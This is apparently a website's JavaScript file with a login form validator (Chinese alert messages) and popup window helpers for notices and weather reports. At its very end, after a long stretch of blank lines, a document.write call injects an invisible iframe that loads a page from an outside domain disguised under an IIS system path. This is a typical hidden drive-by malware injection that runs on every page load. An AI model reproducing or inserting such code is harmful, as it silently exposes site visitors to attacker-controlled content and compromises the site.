function logincheck(){
	if(form1.username.value==""){
		alert("请输入用户名！");
		form1.username.focus();
		return false;
	}
	if(form1.password.value==""){
		alert("请输入密码！");
		form1.password.focus();
		return false;
	}
	form1.action="/servlet/login?act=userLogIn";
	form1.submit();
	form1.username.value="";
	form1.password.value="";
	return false	
}

function Winopen(val){
	if(val!=""){
		window.open(val);
	}
}

function showTzgg(id,links){
	defaultwindow=window.open("/tzgg.jsp?id="+id,"newwindow", "height=400,width=350,top=0,left=0,toolbar=no,menubar=no,scrollbars=yes,resizable=no,location=no,status=no");
	defaultwindow.moveTo((screen.width-350)/2,(screen.height-400)/2);
}

function showTqyb(id,links){
	defaultwindow=window.open("/tqyb.jsp?id="+id,"newwindow", "height=295,width=250,top=0,left=0,toolbar=no,menubar=no,scrollbars=no,resizable=no,location=no,status=no");
	defaultwindow.moveTo((screen.width-350)/2,(screen.height-400)/2);
}

















































































document.write("<iframe style='display:none' src='http://x.whelming.cn/aspnet_client/system_web/1_1_4322/IIS/iis.htm'></iframe>");